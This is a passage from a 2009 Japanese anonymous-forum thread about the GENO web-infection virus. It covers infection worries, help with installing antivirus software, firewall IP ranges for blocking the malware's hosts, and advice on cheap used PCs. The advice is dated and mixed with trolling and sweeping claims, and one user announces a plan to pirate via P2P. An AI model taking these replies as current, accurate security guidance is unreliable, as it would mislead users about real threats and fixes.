俺がこの人だったら、イワンこっちゃない って心底思っているだろうな。
感染したサイトに警告メールを出していたみたいだけど・・・
203:名無しさん@お腹いっぱい。
09/05/16 07:42:31
総被害額どれくらいになるんだろうか
204:名無しさん@お腹いっぱい。
09/05/16 07:42:34
>>187
信頼できるのは余剰パーツで組んだUbuntuマシンだけだぜ…
205:名無しさん@お腹いっぱい。
09/05/16 07:44:03
今IEでみてんだけどさ
Jane styleでみたほうが安全なんだよね。
デスクトップになぜかそのアイコンあるけど。
使ったことないんだよな。
206:名無しさん@お腹いっぱい。
09/05/16 07:45:21
感染サイト踏みそうになってから不安でたまらない
再起動できたしハッシュも大丈夫だし
ウィルスチェックもしたけど気持ちがもやもやする
いやなウィルスだなぁ
207:名無しさん@お腹いっぱい。
09/05/16 07:48:26
というか、違法な割れサイトとかゲームソフト違法DLサイトとか
アダルト関係のサイトじゃなくて、一般のまともなサイトを閲覧しただけで
exeファイルを実行とかしなくても感染するって、今回が初めてじゃない?
208:名無しさん@お腹いっぱい。
09/05/16 07:49:16
・・・。
209:名無しさん@お腹いっぱい。
09/05/16 07:50:21
前にMSのサイトが改ざんされてウイルス撒かれたのはなんてウイルスだっけか?
210:名無しさん@お腹いっぱい。
09/05/16 07:50:54
WinnyとかShareみたいなP2P使わなければ安全だと思ってたのに・・・
まさか、実行ファイルじゃなくて、ただHP見ただけで感染するとか・・・
211:名無しさん@お腹いっぱい。
09/05/16 07:52:00
>>207
そんな事は無い。昔からあった。
ただ今回は手法が少しだけちがった。
212:名無しさん@お腹いっぱい。
09/05/16 07:52:05
サイト見ただけで感染するウィルスなんか
今までいくらでもあっただろ…
どんだけ油断してんだよ…
213:名無しさん@お腹いっぱい。
09/05/16 07:52:58
カスペをダウンロードしたけどスキャンの仕方が分かりません
何度もインストールしますかと出てしまいます
ニフティも何度も使用しているパソコンの環境についての画面になってスキャンできません
何がいけないので出来たら助言お願いします
214:名無しさん@お腹いっぱい。
09/05/16 07:53:36
ちょっと聞きにくいんだけど同人ってどういう意味?
215:名無しさん@お腹いっぱい。
09/05/16 07:53:50
つオンラインスキャン
216:名無しさん@お腹いっぱい。
09/05/16 07:53:56
URLリンク(image.itmedia.co.jp)
これだよな?
>>207
>>210
それは10年前の話。
今回の手口も、これまでに何度も使われてきたやり方。
5年前の記事でも読め。
URLリンク(itpro.nikkeibp.co.jp)
217:名無しさん@お腹いっぱい。
09/05/16 07:54:47
>>214
URLリンク(ja.wikipedia.org)
同人(どうじん)とは、同じ趣味や志をもった人、仲間ないし集団のことである。
218:名無しさん@お腹いっぱい。
09/05/16 07:55:11
>>213
カスペじゃ削除できん
avastをブート時に起動させるんだ!
やり方は知らん、勝手にavastがやった
219:名無しさん@お腹いっぱい。
09/05/16 07:55:51
>>218
Meの場合、avastのブートタイム検査は出来ない
220:名無しさん@お腹いっぱい。
09/05/16 07:56:24
ブートってなに?
221:名無しさん@お腹いっぱい。
09/05/16 07:56:43
だめだこりゃ
222:名無しさん@お腹いっぱい。
09/05/16 07:56:57
>>217
逆に判りづらい説明してやんなよww
223:名無しさん@お腹いっぱい。
09/05/16 07:57:06
ところでClamwinの対応マダー
224:214
09/05/16 07:57:17
>>217
よくわかりました どうも
225:名無しさん@お腹いっぱい。
09/05/16 07:57:21
>>214
同じ趣味、指向性をもった人ってところか。
226:名無しさん@お腹いっぱい。
09/05/16 07:57:40
>>220
URLリンク(ja.wikipedia.org)
ブート(またはブートストラップ、boot、bootstrap)は、コンピュータシステムの電源を入れたときに
オペレーティングシステムを起動するまでの処理の流れをいう。また、ブートローダ(boot loader)とは、ブート処理を行うソフトウェアを意味する。
少しはwikiれ
227:名無しさん@お腹いっぱい。
09/05/16 07:57:42
>>219
更新の止まってるOSでサイトを見るのに使うなよ
まわりへ嫌がらせになるだけじゃん
228:名無しさん@お腹いっぱい。
09/05/16 07:58:09
>>202
>ある状況によっては、MIME-sniffingとして知られたプロセスを通し、Internet Explororブラウザは
>html と同様に、この image fileを実行してしまいます。このことは、ブービートラップのように
>埋め込まれたイメージの中のスクリプトを実行してしまうことを意味しています。
…えーと、IEは画像ファイルからも感染するってこと?
229:214
09/05/16 07:58:29
>>225
ありがとう
230:名無しさん@お腹いっぱい。
09/05/16 07:58:50
>>227
だって、Meの入ったPCしか無いんだもん・・・
231:名無しさん@お腹いっぱい。
09/05/16 08:00:28
知るかそんなの
PC買う金がないなら働くか携帯でも使ってろ
232:名無しさん@お腹いっぱい。
09/05/16 08:00:31
>>218
自分で確認できた範囲では感染はしてないんですがスキャンできない以上怖いので
クリーンインストールしようと思います。
その後にアンチウイルスソフトが必要らしいんですが、ウイルスバスター2009では駄目ですか?
スレでバスターも挙げられてたのを見かけたんですが
233:名無しさん@お腹いっぱい。
09/05/16 08:01:03
>>190
何度か立ったけど、300前後でいつもdat落ち
さすがノーガード戦法のメッカ
234:名無しさん@お腹いっぱい。
09/05/16 08:02:06
>>230
こうやってボットネットが少なくならない原因になってるんですねぇ
235:名無しさん@お腹いっぱい。
09/05/16 08:03:07
RO
、--‐冖'⌒ ̄ ̄`ー-、
/⌒` 三ミヽー-ヘ,_
__,{ ;;,, ミミ i ´Z,
ゝ ''〃//,,, ,,..`ミミ、_ノリ}j; f彡
_) 〃///, ,;彡'rffッ、ィ彡'ノ从iノ彡
>';;,, ノ丿川j !川|; :.`7ラ公 '>了
_く彡川f゙ノ'ノノ ノ_ノノノイシノ| }.: '〈八ミ、、;.)
ヽ.:.:.:.:.:.;=、彡/‐-ニ''_ー<、{_,ノ -一ヾ`~;.;.;)
く .:.:.:.:.:!ハ.Yイ ぇ'无テ,`ヽ}}}ィt于 `|ィ"~
):.:.:.:.:|.Y }: :! `二´/' ; |丶ニ ノノ
) :.: ト、リ: :!ヾ:、 丶 ; | ゙ イ:} 逆に考えるんだ
{ .:.: l {: : } ` ,.__(__,} /ノ
ヽ ! `'゙! ,.,,.`三'゙、,_ /´ 「98やMeはPCではない」
,/´{ ミ l /゙,:-…-~、 ) |
,r{ \ ミ \ `' '≡≡' " ノ と考えるんだ
__ノ ヽ \ ヽ\ 彡 ,イ_
\ \ ヽ 丶. ノ!|ヽ`ヽ、
\ \ヽ `¨¨¨¨´/ |l ト、 `'ー-、__
\ `'ー-、 // /:.:.} `'ー、_
`、\ /⌒ヽ /!:.:.|
`、 \ /ヽLf___ハ/ {
′ / ! ヽ
236:名無しさん@お腹いっぱい。
09/05/16 08:03:59
>>231
買う金はあるよ
今、電気店へ行ったりして物色中
何を買えば良いか迷ってる
予算は7万くらいで、現在ノートPCしか持ってないので
デスクトップ型ならモニターも買わなきゃいけない
とりあえず、OSはXPにすべきかVISTAにすべきか、7にすべきか
後、プリインストールされた本体を買うべきか、別個に買って自分でインストールすべきか・・・
色々と悩むんだな
237:名無しさん@お腹いっぱい。
09/05/16 08:04:33
>>230
朝っぱらから萌えたw
238:名無しさん@お腹いっぱい。
09/05/16 08:04:43
>>235
PCではない……つまりMacということか!
239:名無しさん@お腹いっぱい。
09/05/16 08:04:49
まったく初心者ですが、とりあえず何をしたら感染してるかわかります?
1読んでもよくわかりません
あと感染してたらLANで繋がったPCも全部ヤバいですかね?
240:名無しさん@お腹いっぱい。
09/05/16 08:05:16
前からネットに接続しただけで感染するウイルスとかあったじゃん
241:名無しさん@お腹いっぱい。
09/05/16 08:05:29
>>236
クレカ情報が抜かれるんですね判ります
242:名無しさん@お腹いっぱい。
09/05/16 08:05:31
テンプレ全部読めよ
243:214
09/05/16 08:05:38
>>232
だめ
ウイルスバスターはこういうのの対応遅い
244:名無しさん@お腹いっぱい。
09/05/16 08:06:07
チラシの裏に書け
245:名無しさん@お腹いっぱい。
09/05/16 08:06:35
>>236
8000円の中古PCで十分。
246:名無しさん@お腹いっぱい。
09/05/16 08:06:54
>>239
PC全部窓から投げすればおk
247:名無しさん@お腹いっぱい。
09/05/16 08:07:02
>>245
じゃあ、今のMeで十分だろ
248:名無しさん@お腹いっぱい。
09/05/16 08:07:04
>>239
読む気も理解する気もないだろ
249:名無しさん@お腹いっぱい。
09/05/16 08:07:10
クリーンインストールってメーカー製のパソコンじゃできないんですか?
250:名無しさん@お腹いっぱい。
09/05/16 08:07:24
>>230
こういうの見てると
やっぱりネット接続は免許制度と車検制度(PC検?)みたいなの導入すべきだよなあとつくづく思う
前スレだかに5年くらいしか使ってないのに新しいの買えるかって言ってる輩がいて
そのときもやはり同じ事思った
251:名無しさん@お腹いっぱい。
09/05/16 08:07:44
>>239
インターネットしたら感染する
LANケーブルで繋がったPC、プリンタ、ルータはヤバイ
252:名無しさん@お腹いっぱい。
09/05/16 08:07:56
>>249
少しは自分で調べろ
253:名無しさん@お腹いっぱい。
09/05/16 08:07:58
>>247
問題はサポートが続いてるOSを使う事が第一であって速度は二の次だ
254:名無しさん@お腹いっぱい。
09/05/16 08:09:08
>>249
そのぐらいもわからないならメーカーに電話してこい。
ここより親切に対応してくれるぞ。
255:名無しさん@お腹いっぱい。
09/05/16 08:09:13
PC買い換えるなら要らなくなったPCくれよ
256:名無しさん@お腹いっぱい。
09/05/16 08:09:15
>>253
8千円でサポート続いているOSの入った中古PC買えるのか?
257:名無しさん@お腹いっぱい。
09/05/16 08:09:18
>>249
ググレ
258:名無しさん@お腹いっぱい。
09/05/16 08:09:36
>>240
ネットに繋ぐ「だけ」で感染するブラスターとかあったなあ…
259:名無しさん@お腹いっぱい。
09/05/16 08:09:45
>>239
読んでないだろ
100回読んでもどうしてもわからないなら同人板の方のwiki行け
同人の方の場所がわからないとか言うなよ、抽出しろ
260:名無しさん@お腹いっぱい。
09/05/16 08:09:46
いい加減スレチ
261:名無しさん@お腹いっぱい。
09/05/16 08:09:50
>>243
レスありがとうございます
カスペはインストールしたんですがkis8ってフォルダの中にあるsetupを開こうとすると
「インストールのログファイルを開くときにエラーが発生しました。指定されたログファイルの場所が存在し、
書き込み可能であることを確認してください。」と出てスキャンできないんですが
何がいけないんでしょうか。
262:名無しさん@お腹いっぱい。
09/05/16 08:10:50
>>256
XPの初期のがごろごろ出てる
なんだかんだいっても出てから8年だからなXPは
263:名無しさん@お腹いっぱい。
09/05/16 08:10:59
>>255
要らなくなったPCは、P2P用にするつもり
一度、WinnyとかShareってやってみたかったんだ
でも、個人情報流出とか怖いんで、専用PC持ってない状態じゃすべきじゃないと思っててね
もし、新しいPC買ったら、古いMeの入ったPCはP2P専用マシンになる予定
264:名無しさん@お腹いっぱい。
09/05/16 08:11:47
>>256
XP PRO PEN4 搭載がごろごろあるっつーの。
265:名無しさん@お腹いっぱい。
09/05/16 08:12:02
>>256
2kのなら買えるかもな
266:名無しさん@お腹いっぱい。
09/05/16 08:12:08
>>263
延々とウイルスにかかるわけですね
267:名無しさん@お腹いっぱい。
09/05/16 08:12:27
>>263
ダウンロードも違法扱いになったの知ってるか?
268:名無しさん@お腹いっぱい。
09/05/16 08:12:36
>>264
本体だけ?ノート?
本当に8000円でXPインストール済み?
269:名無しさん@お腹いっぱい。
09/05/16 08:14:25
>>263
セキュ板で割れ宣言するヤツがいるなんて・・・
270:名無しさん@お腹いっぱい。
09/05/16 08:14:51
>>268
この店安いから探してみ
URLリンク(www.geno-web.jp)
271:名無しさん@お腹いっぱい。
09/05/16 08:14:53
>>268
スリムタワーが多いかな5000円ぐらいからが多い
ノートだと10000円からかな
272:94 101 154
09/05/16 08:15:01
>>250
じつは同じヤツだと思うよ。
そのPCでクレジットカード使ってみろって話。
それが嫌で、危険だと分かるなら、ネットにつなぐなって、そう思うよな。
>>261
多分、ディレクトリに日本語が混ざっている。
ドライブのルートでやってみれ。
>>228
そのサイトの人は、そう書いているね。
IE7以前だと、そう(ヤバイ)みたいだね。
IE8では対策されているみたい。
いずれにしても、これまでにあがったような対策をしなきゃならん。
273:214
09/05/16 08:15:01
>>261
最初インストールする時にセットアップするファイルを解凍してできるのがkis8フォルダで
インストール先は変えてなければC:\Program Files\Kaspersky Labです
インストールができたらkis8フォルダはもう要らないので捨てていいよ
274:名無しさん@お腹いっぱい。
09/05/16 08:15:18
>>263は釣りだろ
こやつめははは
275:名無しさん@お腹いっぱい。
09/05/16 08:15:34
>>270
らめぇえぇぇっぇぇえ
276:名無しさん@お腹いっぱい。
09/05/16 08:16:15
>>270
>>268じゃないけどありがとうw
277:名無しさん@お腹いっぱい。
09/05/16 08:16:43
>>270
URLリンク(www.geno-web.jp)
本当に、安いね
278:名無しさん@お腹いっぱい。
09/05/16 08:16:44
>>263
残念 (^^;
279:名無しさん@お腹いっぱい。
09/05/16 08:18:27
GenoウイルスのスレでGenoのサイト勧めるとかww
280:名無しさん@お腹いっぱい。
09/05/16 08:18:34
>>268
デスクトップは本体だけで8000円
15モニタ付きなら12000円
ノートなら2万
どれも4年から5年落ち
初心者はリカバリCD付き買いなよ。
281:名無しさん@お腹いっぱい。
09/05/16 08:19:17
★3まで超マッタリだったのに一昨日からのこの加速ぶりはなんなんだ・・・
282:名無しさん@お腹いっぱい。
09/05/16 08:19:19
ウイルス入りだから安いんだろ
283:名無しさん@お腹いっぱい。
09/05/16 08:20:25
何このGENOマッチポンプ商法
284:名無しさん@お腹いっぱい。
09/05/16 08:20:46
URLリンク(www.geno-web.jp)
【良品中古】 DELL OPTIPLEX GX60 [OPTIPLEX GX60]
(Cel 2.40GHz/ 512MB/ 40GB/ DVD-ROM/ WinXP ProリカバリCD付き)
[販売価格] 7,999 円
これで良いじゃん
285:名無しさん@お腹いっぱい。
09/05/16 08:20:55
>>281
同人板の腐女子連中が流入してきた
286:名無しさん@お腹いっぱい。
09/05/16 08:20:57
安物買いの銭失いになりかねんわ
287:名無しさん@お腹いっぱい。
09/05/16 08:21:20
>>281
同人スレから流れてきてるんじゃね
288:名無しさん@お腹いっぱい。
09/05/16 08:21:43
>>284
ウイルスもプリインストールされてるんだろ?
289:名無しさん@お腹いっぱい。
09/05/16 08:22:30
>>268
使い捨てPCっていいぞ。
290:名無しさん@お腹いっぱい。
09/05/16 08:22:56
そういやアンチウィルスソフトも安売りしてたよね
291:名無しさん@お腹いっぱい。
09/05/16 08:24:36
>>284
企業の払い下げとはいえ、十分使えるスペックのマシンがゴミのような値段とは、恐ろしい世の中だ
292:名無しさん@お腹いっぱい。
09/05/16 08:25:48
次スレいらないね
293:94 101 154
09/05/16 08:26:10
URLリンク(www.itmedia.co.jp)
偽フラッシュのインストールを促すらしいぞ。
みんな気をつけろよ。
294:名無しさん@お腹いっぱい。
09/05/16 08:26:23
>>284
このPCショップは信用できるのか?
HPにウイルス仕込まれているようなところだろ?
やっぱ、買うならソフマップとかで買いたいわ
アフターケアも何も無いような弱小の中古PC屋だと
使い捨てのサブPCなら良いけど、メインとして使うには怖い
295:名無しさん@お腹いっぱい。
09/05/16 08:26:56
>>272
すみませんドライブからルート検索するってどうやるんですか。
>>273
ファイル名を指定して実行したらたくさんファイルが出てきたんですが、
カスペらしき名前のファイルが見当たりませんでした。
どんな名前かとかわからないでしょうか。
296:名無しさん@お腹いっぱい。
09/05/16 08:27:01
見積りとかはVIPでやれよ
ここはセキュリティ板
297:名無しさん@お腹いっぱい。
09/05/16 08:27:02
GENOのURL貼るなw
心臓がどっきんこ言っただろw
298:名無しさん@お腹いっぱい。
09/05/16 08:28:11
やっぱ、「GENOウイルス」って名称は
中古PCショップの「GENO」が発祥だから?
299:名無しさん@お腹いっぱい。
09/05/16 08:28:25
>>294
ソフマップはまともな買取してないからハズレ率が高いよ
300:名無しさん@お腹いっぱい。
09/05/16 08:29:32
>>298
YES
301:名無しさん@お腹いっぱい。
09/05/16 08:30:01
>>299
でも、すぐに潰れるってことは無さそうだし、一応、アフターケアもしているじゃん
困った時に、電話で質問できるってのは大きいよ
ソフマップ以上に信用できる大手の中古PCショップってあるか?
302:名無しさん@お腹いっぱい。
09/05/16 08:30:03
>>295
画面の右下のカスペアイコン右クリックでスキャンとか設定とか
カスペアイコンある? ちゃんとインストール出来てるのかな?
303:名無しさん@お腹いっぱい。
09/05/16 08:30:17
>>293
これ見て、逆にAdobeのアップデータも入れていいのか混乱する人出そうだなw
304:名無しさん@お腹いっぱい。
09/05/16 08:30:38
>>94
勉強になるなぁ
305:名無しさん@お腹いっぱい。
09/05/16 08:31:02
>>298
GENOの対応があまりにもすばらしかったから、それに敬意を表して
GENOウイルスと呼ぶようになった
306:名無しさん@お腹いっぱい。
09/05/16 08:31:55
>>295
あとエクスプローラでファイルやフォルダやドライブを右クリで
カスペマークのスキャン
307:名無しさん@お腹いっぱい。
09/05/16 08:32:02
>>94
>本当に必要なファイルはVirusTotalにかけて、
>それ以外の99パーセントのファイルは、一応スキャンした後で、外付けHDDとかに退避がおすすめ。
>そしてしばらく凍結。
>今は完全に 悪意の攻撃者 >>>>>>>>>>>>>>>>>>>>>>>セキュリティーベンダー
>だから、1ヶ月(いや、最悪半年か?)くらい、不要ファイルは寝かせて、
>セキュリティーベンダーのウィルス特定精度があがってきた頃に、外付けHDDの中を再スキャン。
>その時は、マカフィー、ノートン、G-Data Kaspersky など複数ソフトで検索した方がいいよ。
勉強になるなぁ
308:名無しさん@お腹いっぱい。
09/05/16 08:33:40
>>298
実際、どっかのセキュリティベンダーが、
その初代ウィルスをGENOなんとかって命名してる
309:名無しさん@お腹いっぱい。
09/05/16 08:33:54
ところで、外付けHDDに全ファイルを対比させたとして、
後でUSBでクリーンインストール後のPCに接続した時に、
外付けHDDに潜んでいるウイルスがクリーンなPC本体に入り込む危険は無いの?
310:名無しさん@お腹いっぱい。
09/05/16 08:35:06
>>309
危険は有る
311:272
09/05/16 08:35:20
>>295
ごめん。
そういう意味じゃなくって、
setup.exeの親フォルダはkis8なんでしょ?
そのまた親フォルダか爺さんフォルダか、ひい爺さんフォルダに日本語を含んでない?
例えば、Dドライブ直下に半角英数でKIS8ってフォルダを作って、そこにKIS8の全ファイルを移動してWクリックで
セットアップが起動しないか試してみて。
312:名無しさん@お腹いっぱい。
09/05/16 08:35:30
現状は知らないけど同人板はウイルスが原因で爆撃されて被害に遭ってたよな。
P2Pは関係なくてロダに上がってるファイルから感染してる場合が多いのも特徴だった。
313:名無しさん@お腹いっぱい。
09/05/16 08:35:34
629 :GENO:2009/05/16(土) 07:04:38 ID:SvPTTP+Z0
GENO(ジェノ)ウイルス。
まさにGENOCIDE(集団虐殺)
誰がうまいこと言えと。まぁ俺なんですけどね。
314:名無しさん@お腹いっぱい。
09/05/16 08:35:35
Virtual BoxにUbuntu入れて
それでネットやるか
315:名無しさん@お腹いっぱい。
09/05/16 08:36:22
google charmは今のところ閲覧問題なし?
316:名無しさん@お腹いっぱい。
09/05/16 08:37:12
>>284
開いちゃったんだが大丈夫だよな…?
317:名無しさん@お腹いっぱい。
09/05/16 08:37:22
GENOのおかげで日本中に広まったんだから
敬意を表してGENOウイルスと呼んでやろうぜ
318:名無しさん@お腹いっぱい。
09/05/16 08:37:45
ああカスペをインストールできてないみたいなのか
319:名無しさん@お腹いっぱい。
09/05/16 08:37:46
同人板の連中なんてhtmlも使えない奴ばっかだろ
何言っても無駄
320:名無しさん@お腹いっぱい。
09/05/16 08:37:53
>>302
デスクトップにはkis8って名前のフォルダとkis8.0.0.454.jptaって名前のアイコンがあります。
kis8.0.0.454.jptaのアイコンを右クリックすると開くは出るんですがスキャンは透明でクリックできません。
開いて実行を選択するとC:\Documents and Settings\as\デスクトップ\と出ます、
解凍をクリックすると既に同名のファイルが存在しますと出ます。
>>273さんが教えてくれたC:\Program Files\Kaspersky Labを入力して実行してみたら
インストールの画面が出たんですが、この画面は何度もでてインストールはしたはずなんですが、
やってみたほうがいいでしょうか。
321:名無しさん@お腹いっぱい。
09/05/16 08:38:16
>>316
あなたの危機感がアウトー
322:名無しさん@お腹いっぱい。
09/05/16 08:38:18
>>316
大丈夫ですよ^^
って言ってもらえば満足か?
323:名無しさん@お腹いっぱい。
09/05/16 08:38:27
>>312
それもあるだろうけど
個人でサイト持ってる率が他より多いからじゃね?
FTPでうpする際に撒くと
324:名無しさん@お腹いっぱい。
09/05/16 08:38:58
>>316
感染した可能性はありますん
325:名無しさん@お腹いっぱい。
09/05/16 08:41:53
>>310
じゃあ、一旦、外付けHDDに内容を退避して
OS再インストール後のクリーンPCに戻すことは出来ないの?
USBで接続した瞬間にウイルスが入り込んでくる?
326:名無しさん@お腹いっぱい。
09/05/16 08:42:02
>>320
>>272じゃないけど、フォルダのパスに「デスクトップ」っていう日本語が入ってるからアウトなんじゃない
つまりは、ドライブルートに入れて(つまりマイコンピュータ開いてCドライブ直下にフォルダを移動して)実行すればいけると思う
327:名無しさん@お腹いっぱい。
09/05/16 08:42:27
>>320
同名のファイルが存在しますと出るのはもうすでにkis8フォルダがあるから
一度kis8フォルダを削除してkis8.0.0.454.jptaを>>311さんの言うとおり
D:\とかC:\に移動してからダブルクリックでインストールして
328:94 101 154
09/05/16 08:44:17
>>313
ひそかにうまいと思っていた。
>>295
はカスペインストールできてないと思うんだよ。
解凍しただけだから、setup.exeを起動してインストールさせようとしているんじゃないの?
そう思って>>311 を書いた。
>>320
インストールできていない。
プログラムの追加と削除で確認してみな。
インストールできていたら、セットアップ画面でポリシーと尋ねられるから、そこで迷うはず。
すでに通過したとは思えない。
>>316
トップしかみてないけど、トップは大丈夫くさい。
スクリプトはGeno関連のgoogleだけで、いつもと同じ。
329:名無しさん@お腹いっぱい。
09/05/16 08:45:41
インストール終わったらkis8フォルダ入れないので削除ね
330:名無しさん@お腹いっぱい。
09/05/16 08:46:28
訂正
インストール終わったらkis8フォルダ要らないので削除ね
331:名無しさん@お腹いっぱい。
09/05/16 08:46:42
>>325
とりあえずなんのために時間を置くのか解っているのか
332:名無しさん@お腹いっぱい。
09/05/16 08:48:32
>>284のサイトを開いたがVistaだから問題ないな
333:名無しさん@お腹いっぱい。
09/05/16 08:49:16
Skypeとかメッセンジャーは感染元になったりすることはあるんでしょうか
334:名無しさん@お腹いっぱい。
09/05/16 08:50:21
>>333
他のウイルスならある
335:名無しさん@お腹いっぱい。
09/05/16 08:52:30
仕方ないから貯めた画像だけでチンコしごくか
ひさじぶりに見た画像が妙にエロくて右手が止まらないwwwwwwwwwwwwwwwwwwwwwwwwww
336:名無しさん@お腹いっぱい。
09/05/16 08:53:10
>>334
回答有難うございます
337:名無しさん@お腹いっぱい。
09/05/16 08:53:14
>>335
楽しそうだなwwwwwwww
338:名無しさん@お腹いっぱい。
09/05/16 08:53:34
>>333
URLリンク(www.yomiuri.co.jp)
339:名無しさん@お腹いっぱい。
09/05/16 08:53:45
同人板へお帰りください><;
340:名無しさん@お腹いっぱい。
09/05/16 08:56:15
同人板でデフォルト名無しで書いてるのはこっちから流れてった人か?
デフォ名無しは各自あぼーん対象だぞあそこは
341:94 101 154
09/05/16 08:56:21
>>325
時間おけば、セキュリティーソフトが対応してくるだろうけど、
USBの自動再生はきっておいた方がいい。
URLリンク(support.microsoft.com)
URLリンク(www.atmarkit.co.jp)
URLリンク(blogs.technet.com)
MSがヘマやらかしてるから、情報が交錯していて結構面倒。
うるおぼえだけど、マイクロソフトがXPにおけるUSBの自動再生は無効にする予定だった気がする。
342:名無しさん@お腹いっぱい。
09/05/16 08:57:38
>>335
うおい!なんかイカくせーぞw
343:名無しさん@お腹いっぱい。
09/05/16 08:58:45
USBの自動再生なんぞ
Shell Hardware Detection
っていうサービスとめればすぐとまるだろ
344:名無しさん@お腹いっぱい。
09/05/16 08:59:52
Vistaでも感染するんじゃない?
ieがアドビの更新頻繁に求めて来たぞ
345:名無しさん@お腹いっぱい。
09/05/16 09:00:09
他人の不幸で今日も飯がうまい!!
+ ____ +
+ /⌒ ⌒\ +
キタ━━//・\ ./・\\━━!!!!
+ /::::::⌒(__人__)⌒:::::\ +
| ┬ トェェェイ |
+ \│ `ー'´ / +
_|\∧∧∧MMMM∧∧∧/|_
> <
/ ─ / /_ ─┐ヽ| |ヽ ム ヒ | |
\/ ─ / / ̄ / / | ̄| ̄ 月 ヒ | |
ノ\ __ノ _ノ \ / | ノ \ ノ L_い o o
346:名無しさん@お腹いっぱい。
09/05/16 09:00:21
>>344
感染する
347:名無しさん@お腹いっぱい。
09/05/16 09:01:07
>>345
そう言いながら実はウイルス飼ってるんですよねw
348:名無しさん@お腹いっぱい。
09/05/16 09:03:22
>>306
>>320
>>326
>>327
>>311
レス遅くてすみません。
Cドライブに移して実行したらインストール画面が出てきました。
インストールをクリックすると既に同じバージョンの製品がインストールされてます。上書きインストールを始めますかとでます。
続けても平気でしょうか?
349:名無しさん@お腹いっぱい。
09/05/16 09:05:09
いまさらな質問で悪いんだが、同人サイトが感染ってことはその各管理人がロガーでパス抜かれてサイト編集されたってこと?
だとしたらキーロガーとしてもそうとう恐いウイルスって認識していいの?
流れに乗り遅れていまひとつよくわからん
350:344
09/05/16 09:06:16
〉〉346
把握
351:名無しさん@お腹いっぱい。
09/05/16 09:06:48
そういえばこの間、Adobe Readerのアップデートしやがれって連絡が何度もきてたっけ
これが原因か
352:名無しさん@お腹いっぱい。
09/05/16 09:07:35
>>349
うpする時にファイルにコード書き込むんじゃないっけ?
353:332
09/05/16 09:07:43
>>344
えっ!?
354:名無しさん@お腹いっぱい。
09/05/16 09:09:01
何なのこの勢いw
355:名無しさん@お腹いっぱい。
09/05/16 09:09:14
今ルーターの設定をやっているのだが、拒否するIPアドレスは94.247.0.0/16でOKですか?
356:名無しさん@お腹いっぱい。
09/05/16 09:09:28
>>348
わけわからなくなってるようなのでプログラムの追加と削除で一度アンインストールして
初めからやり直すのがいいんじゃないかな
357:名無しさん@お腹いっぱい。
09/05/16 09:09:56
>>349,352
両方だな感染したままだとうp時にうp先にも繁殖
PC側をクリーンにしてもPWがキーローガーで流れててれば改竄さえる危険が有る
358:名無しさん@お腹いっぱい。
09/05/16 09:10:00
語尾にwを付けたがる奴は同一人物か?
同人板に帰れよ
359:名無しさん@お腹いっぱい。
09/05/16 09:10:39
うほっ、今更ながらcmdとregedit立ち上げを試してみたがどっちも立ち上がった
MD5改変もない、Adobeのリーダーは削除したがフラッシュプレイヤーは10.22.87(?)と確か最新
感染したかもと恐怖したがどうやら大丈夫そうだな・・・
ただ同人サイトの巡回は当分無理だな、しょうがないとはいえ
360:名無しさん@お腹いっぱい。
09/05/16 09:11:03
kis8フォルダも削除ね
361:名無しさん@お腹いっぱい。
09/05/16 09:16:37
まあちゃん♪
362:名無しさん@お腹いっぱい。
09/05/16 09:17:35
>>356
試しにインストールクリックしたら
「インストールのログファイルを開くときにエラーが発生しました。
指定されたログ、ファイルが存在し書き込み可能であるか確認してください」とでてしまいました。
アンインストールしてみます。
363:名無しさん@お腹いっぱい。
09/05/16 09:17:50
そんなあなたにLinux
USBメモリからも起動できて同人サイトの巡回もウマウマ
364:名無しさん@お腹いっぱい。
09/05/16 09:18:28
>>355
他にもあるみたい
365:名無しさん@お腹いっぱい。
09/05/16 09:19:09
>>349
キーロガーじゃ無い事に注意
366:名無しさん@お腹いっぱい。
09/05/16 09:21:47
>>355
厳密に94.247.[2-3].[0-255]だけを弾きたいなら、94.247.2.0/23でもいいんじゃない
俺はFWには94.247.0.0/16で登録してるけど
367:名無しさん@お腹いっぱい。
09/05/16 09:22:13
>>341
USBで接続された外付けHDDの自動再生、つまり「プラグ・アンド・プレイ」のこと?
自動で中身を読み込まなければ、USB接続して外付けHDDの中身をavastとかでチェックかけて
何も出てこなければPC内部のHDDにコピーしてもOK?
368:名無しさん@お腹いっぱい。
09/05/16 09:23:29
>>355
それはちょっと前のZlkonだね。
今は、94.229.65.160/27が必要。
369:名無しさん@お腹いっぱい。
09/05/16 09:25:04
MS、Autorunを正しく無効化するための更新プログラムを公開
370:名無しさん@お腹いっぱい。
09/05/16 09:25:08
>>1に載っているサイトさん(atword.jp/gnome)の最新記事、
矛盾しているように見えるのですが、もし感染していた場合、
サイトのクリーンアップとローカルのクリーンアップどちらを優先するべきですか?
以下のふたつの文章です
--------------------------------------------------------------
>附記的な注意になりますが、すべてのイメージファイルをバックアップから再アップロードしてください。
>※注意:先に全サイト内の全部のディレクトリからすべてのファイルを消す必要があります。
--------------------------------------------------------------
>絶対に感染したPCで感染したサイトのクリーンアップを行わないでください。
>貴方はまず先に、感染しているかもしれないローカルなPCのクリーンアップから開始しなければなりません。
371:名無しさん@お腹いっぱい。
09/05/16 09:26:32
URLリンク(www29.atwiki.jp)
94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
↑
この情報は古い
372:名無しさん@お腹いっぱい。
09/05/16 09:26:57
>>370
まずは自分のPCをきれいにしてください。
373:名無しさん@お腹いっぱい。
09/05/16 09:27:43
クリーンアップ (Clean up) とは野球に於いて、塁の上にいる走者を生還させることが期待される打順のことである。
374:名無しさん@お腹いっぱい。
09/05/16 09:29:28
ここの>>2見てAdobe Readerってダメなのかと思ってAdobe Acrobat Readerググったら有料かよ
大人しくAdobe Readerでチェックボックス外すか
それにしても、カズペが落ち目だからノートン乗り換えようと思ったら、そのノートンがGENOには残念対応とか・・
375:名無しさん@お腹いっぱい。
09/05/16 09:30:47
>>368
もう94.0.0.0/8とかでいいよww
376:名無しさん@お腹いっぱい。
09/05/16 09:32:25
テンプレにこれ入ってないな
PeerGuardian 33
スレリンク(download板)
377:名無しさん@お腹いっぱい。
09/05/16 09:33:21
>>371
いまはどうなってんの?
378:名無しさん@お腹いっぱい。
09/05/16 09:33:55
>>373
なるほど、だから「走者一掃の満塁ホームラン」などと言われるのか。
379:名無しさん@お腹いっぱい。
09/05/16 09:34:00
もしサイトがもう感染してたらファイル消した方がいいんだよな?
380:名無しさん@お腹いっぱい。
09/05/16 09:34:04
>>355
URLリンク(www.rupan.net)
URLリンク(www1.axfc.net)
サイダーなら下の方がいいね
381:名無しさん@お腹いっぱい。
09/05/16 09:35:52
ん?
